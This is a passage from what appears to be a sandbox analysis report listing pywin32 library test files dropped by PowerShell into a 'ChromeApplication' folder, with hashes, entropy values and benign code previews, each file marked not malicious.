                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1087
                                                                                                                                                                                                  Entropy (8bit):5.00200123737897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:PPLDQEkiqPfasc7wpLFbm7/c3jDBzDxvbdSND+epreK2:PjDQErqXasrbm/c3vlzaDJp6j
                                                                                                                                                                                                  MD5:C3AA56BDA9617131859C3583BCEC8520
                                                                                                                                                                                                  SHA1:B198688A397650A1B4818703AE1FE05D76DC609F
                                                                                                                                                                                                  SHA-256:0CA4E6960C37322B4A1D7BBD5C2465D3F749BD13A18F71609855AD825B8A573F
                                                                                                                                                                                                  SHA-512:7849C7F02D50FB841C252CCC72D99F579B3183E3F7AB0476234608F6DD3F1C8BE5EE38A22E1A6D81568C48926BDD2B45BA166A784132B6C1E416BA46D72159D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:function print(msg).{. WScript.Echo(msg) ;.}..function check(condition, msg).{. if (!condition) {. print("***** testPyScriptlet.js failed *****");. print(msg);. }.}..var thisScriptEngine = ScriptEngine() ;..var majorVersion = ScriptEngineMajorVersion() ;.var minorVersion = ScriptEngineMinorVersion() ;.var buildVersion = ScriptEngineBuildVersion() ;..WScript.Echo(thisScriptEngine + " Version " + majorVersion + "." + minorVersion + " Build " + buildVersion) ;..var scriptlet = new ActiveXObject("TestPys.Scriptlet") ;..check(scriptlet.PyProp1=="PyScript Property1", "PyProp1 wasn't correct initial value");.scriptlet.PyProp1 = "New Value";.check(scriptlet.PyProp1=="New Value", "PyProp1 wasn't correct new value");..check(scriptlet.PyProp2=="PyScript Property2", "PyProp2 wasn't correct initial value");.scriptlet.PyProp2 = "Another New Value";.check(scriptlet.PyProp2=="Another New Value", "PyProp2 wasn't correct new value");..check(scriptlet.PyMethod1()=="PyMethod1 called", "Method1 w

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testROT.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):762
                                                                                                                                                                                                  Entropy (8bit):4.249417436354547
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:7Ly7L7LSzm9rsEfAAoFCgfYUhwZB+M8d6lU2Nu/b7MFDGZf02pV7u:KjOy9rsIAtF1nhgYMI6a2u//M1GZRpVS
                                                                                                                                                                                                  MD5:0D8E6608A225F367A0B8523523658194
                                                                                                                                                                                                  SHA1:4C985FB658A70D81669081E8ADE5654E15CFD936
                                                                                                                                                                                                  SHA-256:722BBB52AF304FBB3CB6AC325933BE4DAE025F6C5EFB5E1A949FBB7753F3A4D0
                                                                                                                                                                                                  SHA-512:9C14639B97F7C3A760888F5B80A70132790C9C2710E3BF6420D88514F1D08A4B0767FF3D1FB27BEF28EEBD4FFAF04C6A52DE55C2E1049DC76AA0102EFAF6D89F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.test.util.import winerror...class TestROT(win32com.test.util.TestCase):. def testit(self):. ctx = pythoncom.CreateBindCtx(). rot = pythoncom.GetRunningObjectTable(). num = 0. for mk in rot:. name = mk.GetDisplayName(ctx, None). num += 1. # Monikers themselves can iterate their contents (sometimes :). try:. for sub in mk:. num += 1. except pythoncom.com_error as exc:. if exc.hresult != winerror.E_NOTIMPL:. raise.. # if num < 2:. # print "Only", num, "objects in the ROT - this is unusual"...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testServers.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1391
                                                                                                                                                                                                  Entropy (8bit):4.706826540555441
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:qwpjcnNA9Yieey8XzXEV6yAGX1bSaPkCwRHPBqwRywSX9UpVLU:qwlcoYe97EV6yrX1maPkCwdPBqwkwkUo
                                                                                                                                                                                                  MD5:23988C675E63F14316531CDEED69BE2F
                                                                                                                                                                                                  SHA1:640E181A081B9CCAE3E5DEF2D0D89BFAB6190FA7
                                                                                                                                                                                                  SHA-256:458378BC8C3E5D33A555091F5DB0AAFCD1427A18E34C40820742889B58B95585
                                                                                                                                                                                                  SHA-512:62D77C4A79EAEE64FE2E7F5B5985C7D7BAAB4EC1811A1DC25D3E4FC4FA8E38A6C224407F4012846B0CD5179C9EECF0D4067365036364150F2EDC2873478814A4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.client.dynamic.import win32com.test.util.import winerror...def TestConnections():. import win32com.demos.connect.. win32com.demos.connect.test()...class InterpCase(win32com.test.util.TestCase):. def setUp(self):. # Ensure the correct version registered.. from win32com.servers import interp. from win32com.test.util import RegisterPythonServer.. RegisterPythonServer(interp.__file__, "Python.Interpreter").. def _testInterp(self, interp):. self.assertEqual(interp.Eval("1+1"), 2). win32com.test.util.assertRaisesCOM_HRESULT(. self, winerror.DISP_E_TYPEMISMATCH, interp.Eval, 2. ).. def testInproc(self):. interp = win32com.client.dynamic.Dispatch(. "Python.Interpreter", clsctx=pythoncom.CLSCTX_INPROC. ). self._testInterp(interp).. def testLocalServer(self):. interp = win32com.client.dynamic.Dispatch(. "Python.Interpret

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testShell.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9712
                                                                                                                                                                                                  Entropy (8bit):4.696975918107451
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:pgYVJMiP5CCAsa3ilzj1lBJOvmv0LS2Yz1pECCH4CpV6cQUYBZLSsXM4:ppCC7amzj1lOuvXCH4CGcQU/P4
                                                                                                                                                                                                  MD5:32117930BDE8A38BB8DCBB9A4D8198BF
                                                                                                                                                                                                  SHA1:BB73B66B10AF6246A9EF010EDB59D9E4E36D2B6D
                                                                                                                                                                                                  SHA-256:80B49EC53D6FB396775BADEC4A0D200D9891E654CCB5153109FC9F3E3230524B
                                                                                                                                                                                                  SHA-512:AFE9ADC829E30DC8C8F25B665E2C0BBC87B77A8078EE05D51E2B61CAAF07E42913E844144B1F1F7E97C6077D16BE698B85895D7AAA64DC01B2DDE43C3217ADC3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import datetime.import os.import struct.import sys..import win32timezone..try:. sys_maxsize = sys.maxsize # 2.6 and later - maxsize != maxint on 64bits.except AttributeError:. sys_maxsize = sys.maxint..import pythoncom.import pywintypes.import win32com.test.util.import win32con.from pywin32_testutil import str2bytes.from win32com.shell import shell.from win32com.shell.shellcon import *.from win32com.storagecon import *...class ShellTester(win32com.test.util.TestCase):. def testShellLink(self):. desktop = str(shell.SHGetSpecialFolderPath(0, CSIDL_DESKTOP)). num = 0. shellLink = pythoncom.CoCreateInstance(. shell.CLSID_ShellLink,. None,. pythoncom.CLSCTX_INPROC_SERVER,. shell.IID_IShellLink,. ). persistFile = shellLink.QueryInterface(pythoncom.IID_IPersistFile). names = [os.path.join(desktop, n) for n in os.listdir(desktop)]. programs = str(shell.SHGetSpecialFolderPath(0, CSIDL_PROGRAMS

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testStorage.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3625
                                                                                                                                                                                                  Entropy (8bit):4.665780791634578
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:E0r6nYZmE9W2JjQy+3IRPniJ+rJyqBNQE9WQKnPNtgMrCoUPNhRfS:E0unY39VJCItn5BN/9C1tIRq
                                                                                                                                                                                                  MD5:31FE9649C7E47F2D9D4BB6717B8E553C
                                                                                                                                                                                                  SHA1:6F26774EE37B8412FCA90E77C63E08EB670DDA84
                                                                                                                                                                                                  SHA-256:1AF4FB1C67236D552F8C4BA3FFE8C91A4C5686C98D3AB1C646E1E05CE39CB509
                                                                                                                                                                                                  SHA-512:FC99DB030FD5B102705510EB5DD34AA7C5ECF7AF9E97764ED90C047FB814CF7FCE6B74946AE941A7B40D814D08DE07722F04C0830D218E08F806335638BF831F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32api.import win32com.test.util.from win32com import storagecon...class TestEnum(win32com.test.util.TestCase):. def testit(self):. fname, tmp = win32api.GetTempFileName(win32api.GetTempPath(), "stg"). m = storagecon.STGM_READWRITE | storagecon.STGM_SHARE_EXCLUSIVE. ## file, mode, format, attrs (always 0), IID (IStorage or IPropertySetStorage, storage options(only used with STGFMT_DOCFILE). pss = pythoncom.StgOpenStorageEx(. fname, m, storagecon.STGFMT_FILE, 0, pythoncom.IID_IPropertySetStorage. ). ### {"Version":2,"reserved":0,"SectorSize":512,"TemplateFile":u'somefilename'}).. ## FMTID_SummaryInformation FMTID_DocSummaryInformation FMTID_UserDefinedProperties. psuser = pss.Create(. pythoncom.FMTID_UserDefinedProperties,. pythoncom.IID_IPropertySetStorage,. storagecon.PROPSETFLAG_DEFAULT,. storagecon

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testStreams.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4310
                                                                                                                                                                                                  Entropy (8bit):4.653554216679465
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:MrVx4eETBfOd0SVb8tYM6Rd+smYAbdIF6IWm9AIbJNiLFxS5hq:MrVSe0BfOd0SVwtYM6P+smYA26IWBSrq
                                                                                                                                                                                                  MD5:3E84ECE2EBF5845441965B5484AB2E05
                                                                                                                                                                                                  SHA1:03561EC1979B1B1C33A0E00DF85D862972C288EF
                                                                                                                                                                                                  SHA-256:495150654FC1418F26F305061DE4C1D3EF88AE62B3245CBFA9D0C1B49F2DF95B
                                                                                                                                                                                                  SHA-512:C0871F43D00485B0CD30B4C1025CB9C5E4027B8726658AF15759A2F566CB28B10B207511E38FB2E96E6153DBB588C54572E49DCCFD0EBEC135735D8B3DAB3E80
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import pythoncom.import win32com.server.util.import win32com.test.util.from pywin32_testutil import str2bytes...class Persists:. _public_methods_ = [. "GetClassID",. "IsDirty",. "Load",. "Save",. "GetSizeMax",. "InitNew",. ]. _com_interfaces_ = [pythoncom.IID_IPersistStreamInit].. def __init__(self):. self.data = str2bytes("abcdefg"). self.dirty = 1.. def GetClassID(self):. return pythoncom.IID_NULL.. def IsDirty(self):. return self.dirty.. def Load(self, stream):. self.data = stream.Read(26).. def Save(self, stream, clearDirty):. stream.Write(self.data). if clearDirty:. self.dirty = 0.. def GetSizeMax(self):. return 1024.. def InitNew(self):. pass...class Stream:. _public_methods_ = ["Read", "Write", "Seek"]. _com_interfaces_ = [pythoncom.IID_IStream].. def __init__(self, data):. self.data = data. self

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testWMI.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):468
                                                                                                                                                                                                  Entropy (8bit):4.642578373992172
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:LLyD1GtYAR9YvALRYaHMfY2BmBJg0ASxuUBbzjx2pV7u:aJmYAR90ALqaHOGJg0MUBbP4pVS
                                                                                                                                                                                                  MD5:232B63F04ED5AF9A55D9AA29323B1A5A
                                                                                                                                                                                                  SHA1:0E566DF1E6CF68EF3F9593F7FAA9504560667BB3
                                                                                                                                                                                                  SHA-256:C0EE7863FB5BEDA45AB2F867878971539B7E9CFACC5AA5621476729F74432C23
                                                                                                                                                                                                  SHA-512:D7AB3C438DE049BC9A8CBA6ABB4B5FAFE91D13C8CE5258C9602D2F81EEE80FD23B3F719ECB4EC062C3C3CF322F5B3CF48B9A3A86FE85897C63281C4ED185FE4A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import win32com.test.util.from win32com.client import GetObject...class Simple(win32com.test.util.TestCase):. def testit(self):. cses = GetObject("WinMgMts:").InstancesOf("Win32_Process"). vals = []. for cs in cses:. val = cs.Properties_("Caption").Value. vals.append(val). self.assertFalse(len(vals) < 5, "We only found %d processes!" % len(vals))...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testall.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9904
                                                                                                                                                                                                  Entropy (8bit):4.5596532805041745
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:RbcidMLQ0fbgntHlvAJE4Eyl5gQ16OMPunmstb3JCOSNk3XNj8d:RbF3fdpYEyc3kghknR+
                                                                                                                                                                                                  MD5:762B5806764FB8884DDF708AC1713DAF
                                                                                                                                                                                                  SHA1:9D3F88513B31F7C014953ADC003284EE169D262B
                                                                                                                                                                                                  SHA-256:D1095A75E18D533102A903BBC6A901FABC72BCE0433BC5A6741EF8F449344BF4
                                                                                                                                                                                                  SHA-512:17D2B8FD164377BD7361F50CB09C7C595B14B15B4FD9B5BCE5DE0F1966FC10B51CD1468013FD17A3204AF23A7C61905400ECA3D0A085C8E1F4F24C06A088E3BC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import getopt.import os.import re.import sys.import traceback.import unittest..try:. this_file = __file__.except NameError:. this_file = sys.argv[0]..win32com_src_dir = os.path.abspath(os.path.join(this_file, "../.."))..import win32com..# We'd prefer the win32com namespace to be the parent of __file__ - ie, our source-tree,.# rather than the version installed - otherwise every .py change needs a full install to.# test!.# We can't patch win32comext as most of them have a .pyd in their root :(.# This clearly ins't ideal or perfect :).win32com.__path__[0] = win32com_src_dir..import pythoncom.import win32com.client.from win32com.test.util import (. CapturingFunctionTestCase,. CheckClean,. RegisterPythonServer,. ShellTestCase,. TestCase,. TestLoader,. TestRunner,.)..verbosity = 1 # default unittest verbosity....def GenerateAndRunOldStyle():. from . import GenTestScripts.. GenTestScripts.GenerateAll(). try:. pass #. finally:. GenTestScri

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testmakepy.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1922
                                                                                                                                                                                                  Entropy (8bit):4.632062553526672
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:/DArNcTt2i5aGZBmO8Q3U/8AMahNt9YC7:/DAoxaWcO8QbaRn7
                                                                                                                                                                                                  MD5:32824449739BE20E2462D0D5D9005CF9
                                                                                                                                                                                                  SHA1:5ED03EDE8C1DA880429F946B575D8E764441565D
                                                                                                                                                                                                  SHA-256:D7865B59B9A3D0F3A2A5FEDE37447FEDAA81E0A4EFBFD2DE329AAC82A1D1FF1F
                                                                                                                                                                                                  SHA-512:F15B0D2C6E061821C180F5E69163A0F04E3B762A765893181F946C29D3CBF5B1EEE45EB75E0060F18E91A649B5462FF26D4C7F80AF09F2A1DCE85AAA6520A22A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test makepy - try and run it over every OCX in the windows system directory...import sys.import traceback..import pythoncom.import win32api.import win32com.test.util.import winerror.from win32com.client import gencache, makepy, selecttlb...def TestBuildAll(verbose=1):. num = 0. tlbInfos = selecttlb.EnumTlbs(). for info in tlbInfos:. if verbose:. print("%s (%s)" % (info.desc, info.dll)). try:. makepy.GenerateFromTypeLibSpec(info). # sys.stderr.write("Attr typeflags for coclass referenced object %s=%d (%d), typekind=%d\n" % (name, refAttr.wTypeFlags, refAttr.wTypeFlags & pythoncom.TYPEFLAG_FDUAL,refAttr.typekind)). num += 1. except pythoncom.com_error as details:. # Ignore these 2 errors, as the are very common and can obscure. # useful warnings.. if details.hresult not in [. winerror.TYPE_E_CANTLOADLIBRARY,. winerror.TYPE_E_LIBNOTREGISTERED,

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testvb.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):20911
                                                                                                                                                                                                  Entropy (8bit):4.667838645415224
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:HG8iXGFLsGFG2gC3UaBNtxtwYtotz/G6M9G5CPu7ugGyb7jiV9h+KEST+J/E/KEB:HGOUetxtFtotC6OG8eiRKI3l5rJyjEOg
                                                                                                                                                                                                  MD5:2C2F8654593CD56FA8550FFE38A76FDC
                                                                                                                                                                                                  SHA1:03B23958261A9DD7D8B986CA3CCFCD4358C3C813
                                                                                                                                                                                                  SHA-256:BC938B79C1CB61F3B4D79C3E239CB60F0F7AF98CF88FA3DADBB30E935E929421
                                                                                                                                                                                                  SHA-512:89E4E93ED244D50380085D174D58E1A1C7F01C2C91D39311503AD482B5DCAF7CA73295860F47DCAC3466DC7B7413E2F60E9F584193A2CB45E27F2A8CCF731768
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# Test code for a VB Program..#.# This requires the PythonCOM VB Test Harness..#..import sys.import traceback..import pythoncom.import win32com.client.import win32com.client.dynamic.import win32com.client.gencache.import winerror.from pywin32_testutil import str2memory.from win32com.server.util import NewCollection, wrap.from win32com.test import util..# for debugging.useDispatcher = None.## import win32com.server.dispatcher.## useDispatcher = win32com.server.dispatcher.DefaultDebugDispatcher..error = RuntimeError...# Set up a COM object that VB will do some callbacks on. This is used.# to test byref params for gateway IDispatch..class TestObject:. _public_methods_ = [. "CallbackVoidOneByRef",. "CallbackResultOneByRef",. "CallbackVoidTwoByRef",. "CallbackString",. "CallbackResultOneByRefButReturnNone",. "CallbackVoidOneByRefButReturnNone",. "CallbackArrayResult",. "CallbackArrayResultOneArrayByRef",. "CallbackArrayRes

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testvbscript_regexp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1096
                                                                                                                                                                                                  Entropy (8bit):4.691199509807831
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:aJws2q91vyqW5NgXnnUutaNiVaok5OpVS:Ews2kVvQNQnn1mGTfS
                                                                                                                                                                                                  MD5:85D4894892C1975ABDC339212CBAFD49
                                                                                                                                                                                                  SHA1:1E0FB80CF40EB687053E12A00DC74DFA56808795
                                                                                                                                                                                                  SHA-256:108114E128DE165DB1C520EB2EC758838F8F8AF58F723DC0597B93DD95EBA741
                                                                                                                                                                                                  SHA-512:DD442D7357F814D3D762608464E752C9493758E2BA5AEB8E41A0E6B80FAF4C56A5CAFD531C7EF8794BDC8C02281E5BBC5E765A5D803D892A55265B60E3A6F1E0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import unittest..import win32com.test.util.from win32com.client.dynamic import DumbDispatch.from win32com.client.gencache import EnsureDispatch...class RegexTest(win32com.test.util.TestCase):. def _CheckMatches(self, match, expected):. found = []. for imatch in match:. found.append(imatch.FirstIndex). self.assertEqual(list(found), list(expected)).. def _TestVBScriptRegex(self, re):. StringToSearch = "Python python pYthon Python". re.Pattern = "Python". re.Global = True.. re.IgnoreCase = True. match = re.Execute(StringToSearch). expected = 0, 7, 14, 21. self._CheckMatches(match, expected).. re.IgnoreCase = False. match = re.Execute(StringToSearch). expected = 0, 21. self._CheckMatches(match, expected).. def testDynamic(self):. re = DumbDispatch("VBScript.Regexp"). self._TestVBScriptRegex(re).. def testGenerated(self):. re = EnsureDispatch("VBScrip

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testxslt.js

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):569
                                                                                                                                                                                                  Entropy (8bit):4.996906879670943
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:aqg5AGVGQTA+ejRRB3cxEAGV87oNRRB1qkOA0gmLMBejLl7mW+QR3C:aT5AGIQ8P3hcxEAGR3PqkN0gmQcVhjRy
                                                                                                                                                                                                  MD5:D554BE734CB85844B11399768011CCE4
                                                                                                                                                                                                  SHA1:ED8AFBCD33369D5639D3C0BC32B7ABC6BDBDC85F
                                                                                                                                                                                                  SHA-256:75F0426A7CBE91D5556170F93A69A07FB1657790CE5615AAEE894CE17A39EF11
                                                                                                                                                                                                  SHA-512:9F59DEED36D9C36B68FA33A25C66A5BC8AA937DA1CDD41D5106B8072BE56F1C082162603BA260E2948A2C4D630D7219BF733FD3D841527578B0CD4CEF5775620
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview://Args: input-file style-file output-file.var xml = WScript.CreateObject("Microsoft.XMLDOM"); //input.xml.validateOnParse=false;.xml.load(WScript.Arguments(0));.var xsl = WScript.CreateObject("Microsoft.XMLDOM"); //style.xsl.validateOnParse=false;.xsl.load(WScript.Arguments(1));.var out = WScript.CreateObject("Scripting.FileSystemObject"); //output.var replace = true; var unicode = false; //output file properties.var hdl = out.CreateTextFile( WScript.Arguments(2), replace, unicode ).hdl.write( xml.transformNode( xsl.documentElement ));.//eof.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testxslt.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):921
                                                                                                                                                                                                  Entropy (8bit):4.210786222625114
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:0gchw3F9GRa+eRtyRdgkLgrYrmYJbn2xpVS:Ghw3LGrenC/dVJb2xfS
                                                                                                                                                                                                  MD5:C7D703290904AF62F8A614D2F10E5403
                                                                                                                                                                                                  SHA1:2C9FD5E5AFBD6906B98689D16C7A006A4599DF85
                                                                                                                                                                                                  SHA-256:8AF9A3943E86626C6D6CC91C11594B12A3C02A82764171F0C064991D82A27ACB
                                                                                                                                                                                                  SHA-512:7880BEA13CB219E5EB04E5ABA8D4462817FA37C77E47931FA90E76305138B167ADC2EAD920B5C655FB76D0E07ADC34AD38AE02355D41275D2A5E6B99AB315621
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import os.import tempfile.import unittest..import win32com.test.util..expected_output = "The jscript test worked.\nThe Python test worked"...class XSLT(win32com.test.util.TestCase):. def testAll(self):. output_name = tempfile.mktemp("-pycom-test"). cmd = (. "cscript //nologo testxslt.js doesnt_matter.xml testxslt.xsl " + output_name. ). win32com.test.util.ExecuteShellCommand(cmd, self). try:. f = open(output_name). try:. got = f.read(). if got != expected_output:. print("ERROR: XSLT expected output of %r" % (expected_output,)). print("but got %r" % (got,)). finally:. f.close(). finally:. try:. os.unlink(output_name). except os.error:. pass...if __name__ == "__main__":. unittest.main().

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\testxslt.xsl

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2058
                                                                                                                                                                                                  Entropy (8bit):4.628887308709545
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:+aHUa1HXIULa1dhchWMfQHPV3M3Ll7vvIT91wlLv:+f0HX1QGJfQHPdULJvATvwlb
                                                                                                                                                                                                  MD5:3AB554D42090171E1253172269EA23CC
                                                                                                                                                                                                  SHA1:B0999CC2465E29972BA22D62B99D5F7F57AB692A
                                                                                                                                                                                                  SHA-256:EBEAC1C9122414E43557AF079F4341A73A7A5B0E5C87AB85BD82430BD8CB8D81
                                                                                                                                                                                                  SHA-512:B356E2C9E370A18296F81E91DCA2F698B1BDDA6A046BEC911B7C0746F5EC16D5032A0BED169BB439F87A0C94543DE0E9FA484B7D4E1297B06CD3C5620FFEFFCF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview: include in the xsl:stylesheet element:. (a) the version attribute as usual. (b) the XSLT namespace declaration as usual. (c) the MSXSL namespace declaration. (d) a namespace declaration to identify your functions. (e) the 'extension-element-prefixes' attribute to give the. namespace prefixes that indicate extension elements. (i.e. 'msxsl'). (f) the 'exclude-result-prefixes' attribute to indicate the. namespaces that aren't supposed to be part of the result. tree (i.e. 'foo') -->.<xsl:stylesheet version="1.0". xmlns:xsl="http://www.w3.org/1999/XSL/Transform". xmlns:msxsl="urn:schemas-microsoft-com:xslt". xmlns:foo="http://www.pythoncom-test.com/foo". xmlns:bar="http://www.pythoncom-test.com/bar". extension-element-prefixes="msxsl". exclude-result-prefixes="foo bar">.. do whatever output you want - you can use full XSLT functionality.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\test\util.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8175
                                                                                                                                                                                                  Entropy (8bit):4.552793670747682
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:6HDNB3kwqLuPs+hQVYgNxFcFqgM1k4JMzQKoJ5mdjqmS:6HDNkL42xcx4JMzQKoHr
                                                                                                                                                                                                  MD5:EB32AD5A4CB98B7A2F49BA7DBBFD7057
                                                                                                                                                                                                  SHA1:382F050294B787A9D82DB6F05B24EFE601D4ABAC
                                                                                                                                                                                                  SHA-256:AE3F40AAE239A49FCF2C8D3E992C934BE17203FA04EE389B83C07B1BAC7BB324
                                                                                                                                                                                                  SHA-512:F19D14CC099DBD4F981B20FA71083608443769A6F6050FD3D42A12FF3A0923045509A16314B6C771B9CAAA8A34AF2BB8217F7C789BE3246862285187F32D9354
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import gc.import logging.import os.import sys.import tempfile.import unittest.import winreg..import pythoncom.import pywin32_testutil.import pywintypes.import win32api.import win32com.import winerror.from pythoncom import _GetGatewayCount, _GetInterfaceCount.from pywin32_testutil import LeakTestCase, TestLoader, TestResult, TestRunner...def CheckClean():. # Ensure no lingering exceptions - Python should have zero outstanding. # COM objects. try:. sys.exc_clear(). except AttributeError:. pass # py3k. c = _GetInterfaceCount(). if c:. print("Warning - %d com interface objects still alive" % c). c = _GetGatewayCount(). if c:. print("Warning - %d com gateway objects still alive" % c)...def RegisterPythonServer(filename, progids=None, verbose=0):. if progids:. if isinstance(progids, str):. progids = [progids]. # we know the CLSIDs we need, but we might not be an admin user. # and otherwise unable to regis

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\win32com\universal.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8532
                                                                                                                                                                                                  Entropy (8bit):4.453702334139223
                                                                                                                                                                                                  Encrypted:false
